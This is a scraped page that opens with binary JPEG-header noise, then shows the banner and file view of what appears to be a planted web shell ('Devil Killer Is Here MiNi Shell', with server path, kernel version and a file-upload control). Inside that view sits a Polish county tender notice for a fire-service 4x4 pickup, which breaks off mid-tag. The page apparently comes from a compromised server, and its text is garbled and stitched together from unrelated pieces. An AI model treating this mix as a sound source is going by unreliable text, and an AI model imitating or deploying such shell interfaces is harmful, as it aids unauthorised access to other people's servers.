JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251003/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251003/0045558701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup lekkiego pojazdu rozpoznawczo - ratowniczego typu pickup z napędem terenowym </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Radomski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 670223110</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Tadeusza Mazowieckiego 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radom</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@spradom.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.spradom.finn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup lekkiego pojazdu rozpoznawczo - ratowniczego typu pickup z napędem terenowym </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4661f33c-094a-466d-8618-c0ba95ca0917</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00455587</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://powiat-radomski.ezamawiajacy.pl/servlet/HomeServlet <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://powiat-radomski.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w Instrukcji korzystania dla Wykonawców. Instrukcja jest udostępniona na platformie Marketplanet OnePlace.<br/>2. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia oferty lub wniosku oraz do komunikacji wynosi 100 MB. <br/>3. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na platformę Marketplanet OnePlace.<br/>4. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za pośrednictwem platformy Marketplanet OnePlace w zakładce Korespondencja z Wykonawcami.<br/>5. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się w języku polskim za pośrednictwem Platformy zakupowej znajdującej się pod adresem:<br/>https://powiat-radomski.ezamawiajacy.pl/servlet/HomeServlet w zakładce „Korespondencja”.<br/>6. Sposób sporządzania oraz sposób przekazywania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30.12.2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://powiat-radomski.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>a) administratorem Pani/Pana danych osobowych jest Starostwo Powiatowe w Radomiu reprezentowane przez Starostę z siedzibą w Radomiu przy ul. T. Mazowieckiego 7, tel. (48) 36-55-801, adres e-mail: powiat@radompowiat.pl<br/>b) dane kontaktowe do Inspektora Ochrony Danych: Beata Kiełbania-Kubik - Starostwo Powiatowe w Radomiu, ul. T. Mazowieckiego 7, 26-600 Radom, pok. 124, tel. (48) 36-55-801 wew. 181; (48) 340 40-64 wew. 181, e-mail: bkubik@spradom.eu; <br/>c) Pani/Pana dane osobowe przetwarzane będą w celu realizacji ustawowych zadań urzędu - na podstawie art. 6 ust. 1 lit. b, c ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016r. oraz na podstawie Art. 9 ust 2 lit a ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016r.;<br/>d) odbiorcami Pani/Pana danych osobowych będą wyłącznie podmioty uprawnione do uzyskania danych osobowych na podstawie przepisów prawa w tym m.in. osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 i 2 ustawy z dnia 11września 2019 roku – Prawo zamówień publicznych (t. j. Dz. U. z 2024 r. poz. 1320), dalej „ustawa Pzp”;<br/>e) Pani/Pana dane osobowe przechowywane będą w czasie określonym przepisami prawa, zgodnie z instrukcją kancelaryjną;<br/>f) posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo do żądania od administratora dostępu do danych osobowych <br/>- na podstawie art. 16 RODO prawo do ich sprostowania*<br/>- na podstawie art.18 RODO prawo do ograniczenia przetwarzania prawo żądania <br/>od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **;<br/>g) ma Pani/Pan prawo wniesienia skargi do organu nadzorczego (tj. Prezesa Urzędu Ochrony Danych Osobowych) przy ul. Stawki 2, 00-193 Warszawa);<br/>h) nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o których mowa w art. 20 RODO,<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">*: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników. <br/>**: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, wcelu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego. Zamawiający dodatkowo informuje, że: Wykonawca ubiegający się o udzielenie zamówienia publicznego jest zobowiązany do wypełnienia obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO wobec osób fizycznych, od których dane osobowe bezpośrednio lub pośrednio pozyskał w celu ubiegania się o udzielenie zamówienia publicznego w niniejszym postępowaniu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ON.272.195.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup i dostawa fabrycznie nowego, nieużywanego lekkiego pojazdu rozpoznawczo - ratowniczego typu pickup z napędem terenowym, w ramach Programu Ochrony Ludności i Obrony Cywilnej na lata 2025-2026.<br/>Szczegółowe minimalne wymagania techniczno-użytkowe dla przedmiotu zamówienia zawarte zostały w Rozdziale V SWZ.<br/>OPIS PRZEDMIOTU ZAMÓWIENIA <br/>1. Samochód fabrycznie nowy, rok produkcji nie wcześniej jak 2025, nadwozie typu „pickup” z zabudową wysoką skrzyni ładunkowej „hard top”. Samochód musi posiadać świadectwo homologacji typu lub świadectwo zgodności WE.<br/>2. Pojazd musi spełniać wymagania polskich przepisów o ruchu drogowym z uwzględnieniem wymagań dotyczących pojazdów uprzywilejowanych zgodnie z Ustawą „Prawo o ruchu drogowym” (t.j. Dz. U. z 2024 r., poz. 1251) wraz z przepisami wykonawczymi do ustawy. Wykonawca dostarczy dokumentację niezbędną do użytkowania pojazdu jako uprzywilejowanego. W sytuacji, gdy dostarczenie wymaganego dokumentu możliwe będzie po zarejestrowaniu pojazdu, dopuszcza się dostarczenie po dokonaniu odbioru, jednak wszelkie koszty z tym związane pokrywa Wykonawca. 3. Pojazd musi spełniać wymagania rozporządzenia Ministra Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. z 2024 r., poz. 502, z póź. zm.). 4. Pojazd musi być oznakowany numerami operacyjnymi Państwowej Straży Pożarnej zgodnie z zarządzeniem nr 6 Komendanta Głównego Państwowej Straży Pożarnej z dnia 8 maja 2025 r. w sprawie gospodarki transportowej w jednostkach organizacyjnych Państwowej Straży Pożarnej (Dz. Urz. KG PSP poz. 9, z późn. zm). Oznakowanie nadwozia pojazdu atestowaną folią odblaskową min. typ II (plaster miodu): pas w kolorze czerwonym, napis „STRAŻ” i numer operacyjny w kolorze białym. Dane dotyczące oznaczenia zostaną przekazane w trakcie realizacji zamówienia. 5. Zmiany adaptacyjne pojazdu, dotyczące montażu wyposażenia, nie mogą powodować utraty ani ograniczać uprawnień wynikających z fabrycznej gwarancji producenta pojazdu. 6. Klasa pojazdu (wg PN-EN 1846-1): L (lekka), kategoria pojazdu: 2 (uterenowiona). Pojazd musi spełniać wymagania Polskiej Normy PN-EN 1846-2. Maksymalna masa rzeczywista samochodu nie może przekroczyć 3000 kg. Dopuszczalna masa całkowita pojazdu podana w świadectwie homologacji nie może przekroczyć 3500 kg. 7. Typ nadwozia 4-drzwiowy, kabina 5 osobowa, jednomodułowa z układem miejsc 1+1+3, pasy bezpieczeństwa 3-punktowe, bezwładnościowe, z napinaczami oraz zagłówki przy wszystkich miejscach, fotel kierowcy z regulacją wysokości, odległości i pochylenia oparcia. Fotele przednie podgrzewane. Siedzenia pokryte materiałem łatwym w utrzymaniu <br/>w czystości, nienasiąkliwym, odpornym na ścieranie i anty-poślizgowym. Kabina powinna być automatycznie oświetlana po otwarciu drzwi danej części kabiny z możliwością włączenia oświetlenia kabiny, gdy drzwi są zamknięte.<br/>8. Wymiary pojazdu: a) długość całkowita co najmniej 5300 mm,<br/>b) szerokość całkowita ze złożonymi lusterkami co najmniej 2000 mm,<br/>c) rozstaw osi co najmniej 3000 mm, d) maksymalna masa ciągniętej przyczepy z hamulcem min 3500 kg. e) długość przestrzeni ładunkowej min 1450 mm (na wysokości podłogi) f) szerokość przestrzeni ładunkowej min 1500 mm (pomiędzy burtami)<br/>9. Parametry trakcyjne (pomiary bez obciążenia): a) kąt natarcia min. 28°,<br/>b) kąt zejścia min. 22°, c) kąt rampowy min. 20°, d) głębokość brodzenia min. 700 mm, e) ładowność przestrzeni bagażowej / sprzętowej minimum 600 kg.<br/>10. Prześwit pod osiami, mierzony bez obciążenia: co najmniej 250 mm<br/>11. Napęd: - silnik wysokoprężny o mocy co najmniej 170 KM, maksymalnym momencie obrotowym min. 400 Nm, pojemności skokowej min. 1950 cm3. Silnik produkowany seryjnie, bez przeróbek. Silnik spełniający wymagania w zakresie czystości spalin, zgodne z wymogami prawnymi obowiązującymi w czasie dostawy. 12. Skrzynia biegów min 6-stopniowa automatyczna, posiadająca bieg wsteczny. 13. Samochód wyposażony w napęd 4x4, z fabryczną blokadą mechanizmu różnicowego minimum jednej osi napędowej.<br/>14. Układ kierowniczy ze wspomaganiem. Kierownica po lewej stronie, wielofunkcyjna regulowana. 15. Pojazd wyposażony w systemy wspomagające działania układu kierowniczego, hamulcowego i zawieszenia m.in. : - System zapobiegający blokowaniu kół podczas hamowania,<br/>- Elektroniczny system podziału siły hamowania, - System optymalizacji przyczepności podczas przyspieszenia, - System stabilizacji toru jazdy,<br/>- System wspomagania podczas ruszania na wzniesieniach, - System wspomagający zjazd ze wzniesienia, 16. Obręcze kół ze stopów lekkich – aluminiowe, fabrycznie nowe, minimum 18 cali, opony wielosezonowe.<br/>17. Pełnowymiarowe koło zapasowe, podnośnik, klucz do kół, trójkąt ostrzegawczy, fabryczny zestaw narzędzi przewidzianych do wyposażenia pojazdu przez producenta, gaśnica proszkowa ABC o masie środka gaśniczego min. 2 kg – przewożone w pojeździe. 18. Kolor nadwozia lakierowany: czerwony, biały lub srebrny. Nie dopuszczalne jest oklejanie pojazdu.<br/>19. Lusterka zewnętrzne elektrycznie regulowane, składane i podgrzewane.<br/>20. Min. poduszki powietrzne przednie, boczne i kurtynowe kierowcy i pasażera. Poduszki chroniące kolana kierowcy. 21. Siedzenia wyłożone tapicerką z tkaniny odpornej na zmywanie i dezynfekcję. 22. Pojemność zbiornika paliwa min. 70 l. 23. Moc alternatora i pojemność akumulatorów musi zapewnić pełne zapotrzebowanie na energię elektryczną, przy jej maksymalnym obciążeniu. 24. Hak holowniczy kulowy, homologowany z instalacją elektryczną i gniazdem 13 – pinowym do podłączenia przyczepy wraz z przejściówką na gniazdo standardowe (7 pinowe). Hak holowniczy o max masie holowania 3500 kg. 25. Reflektory - LED ze światłami do jazdy dziennej LED Reflektory z automatyczną zmianą świateł (czujnik zmierzchu). Przednie światła przeciwmgielne. Przypomnienie (powiadomienie) o wyłączeniu świateł głównych. 26. Dodatkowe zabezpieczenie antykorozyjne podwozia. 27. Pojazd wyposażony w osłony przeciwbłotne przednie i tylne oraz osłonę podwozia chroniącą przed uszkodzeniami mechanicznymi. <br/>28. Dodatkowe minimalne wyposażenie samochodu: a) immobiliser,<br/>b) centralny zamek sterowany zdalnie, c) stopnie boczne ułatwiające wsiadanie do auta, d) klimatyzacja automatyczna dwustrefowa,<br/>e) czujniki parkowania z przodu i z tyłu oraz kamera cofania z tyłu pojazdu, f) elektroniczne wspomaganie siły hamowania, g) układ kierowniczy ze wspomaganiem, kierownica regulowana w dwóch płaszczyznach, <br/>h) tempomat adaptacyjny i) system wykrywania pieszych i reagowania w przypadku zderzenia, j) automatyczne wycieraczki szyby przedniej z czujnikiem deszczu k) radioodtwarzacz multimedialny dotykowy z możliwością połączenia ze smartphonem. System multimedialny powinien umożliwić wykorzystanie aplikacji Android Auto. l) zestaw głośnomówiący,<br/>m) min. 1 gniazdo USB, 2 gniazda 12 V (w kabinie), 2 gniazda 12 V (w przedziale bagażowym), n) elektryczne sterowanie (opuszczanie i podnoszenie) szyb w drzwiach przednich i tylnych, o) boczne tylne szyby w przedziale załogi przyciemniane, p) dywaniki gumowe z wysokimi brzegami przód i tył, q) oświetlenie wnętrza, r) regulacja foteli kierowcy i pasażera,<br/>s) przypomnienie (powiadomienie) o wyłączeniu świateł głównych.<br/>29. Dodatkowa instalacja elektryczna (dokładana poza fabryczną) wyposażona w główny wyłącznik prądu, jako zabezpieczenie przed nadmiernym rozładowaniem akumulatorów dla urządzeń dodatkowo zainstalowanych w pojeździe poza wyposażeniem fabrycznym, <br/>tj. radiotelefonu, przetwornicy itp. <br/><br/> <br/>Szczegółowe minimalne wymagania techniczno-użytkowe dla przedmiotu zamówienia zawarte zostały w Rozdziale V SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34113300-5 - Pojazdy terenowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34131000-4 - Pikapy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-12</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający wybiera najkorzystniejszą ofertę na podstawie kryteriów oceny ofert określonych w SWZ. <br/>2. Zamawiający będzie oceniał oferty, które nie zostały odrzucone, według następujących kryteriów: <br/><br/>Nr Nazwa kryterium Waga/znaczenie <br/>1. Cena [C] 60 pkt <br/>2. Okres gwarancji i rękojmi	40 pkt<br/><br/>3. Za najkorzystniejszą uznana zostanie ta z ocenianych ofert, która uzyska najwyższą ocenę punktową. <br/>4. Dla zastosowanych kryteriów oceny ofert Zamawiający będzie obliczał wartość punktową oferty (zaokrągloną do dwóch miejsc po przecinku) w oparciu o następujące wzory: <br/>4.1 Cena [C] <br/>Ocena w zakresie kryterium „Cena” będzie dokonywana na podstawie ilości punktów otrzymanych przy zastosowaniu następującego wzoru (liczba punktów możliwych <br/>do uzyskania – 60): <br/><br/>C = (Cn/Cb) × 60 pkt. <br/>gdzie: C – ilość punktów za kryterium „Cena” <br/>Cn – najniższa cena ofertowa spośród ofert nieodrzuconych Cb – cena badanej oferty <br/> <br/>4.2	Kryterium - okres gwarancji jakości i rękojmi (G)<br/>Ocena w zakresie kryterium „okres gwarancji i rękojmi” na samochód wraz <br/>z zabudową i wyposażeniem będzie dokonywana na podstawie ilości punktów otrzymanych przy zastosowaniu następującego wzoru (liczba punktów możliwych do uzyskania – 40):<br/><br/>24 miesiące – 0 pkt.<br/>36 miesięcy – 20 pkt.<br/>48 miesięcy – 40 pkt.<br/><br/>Okres udzielonej przez Wykonawcę gwarancji jakości i rękojmi na samochód wraz z zabudową i wyposażeniem w kryterium nie może być krótszy niż 24 miesięcy oraz dłuższy niż 48 miesiące.<br/><br/>UWAGA! <br/>W Formularzu ofertowym należy podać oferowany okres gwarancji. Zamawiający przyzna liczbę punków wg wskazanego powyżej kryterium - okres gwarancji jakości i rękojmi.<br/>W przypadku, gdy wykonawca nie wskaże żadnego z wymienionych kryteriów lub wskaże inne spoza wymienionego powyżej, zamawiający przyjmie, iż zaoferował minimalny tj. 24-m-ce od dnia podpisania Umowy i przyjmie wartość – 0 pkt. <br/>Uzyskanie 0 pkt. w przedmiotowym kryterium nie eliminuje oferty z dalszej oceny. <br/><br/>Zamawiający w tym kryterium przydzieli punktację według poniższego wzoru:<br/>1 pkt = 1%<br/><br/>Ocena oferty. <br/>Zamawiający wybierze ofertę, która otrzyma najwyższą liczbę punktów (P), stanowiących sumę punktów przyznanych w ramach każdego z podanych kryteriów, wyliczoną zgodnie z poniższym wzorem: <br/>P = C + G gdzie: P- liczba punktów uzyskanych przez ofertę <br/><br/>5. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze. <br/>6. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną. <br/>7. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w pkt. 6, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 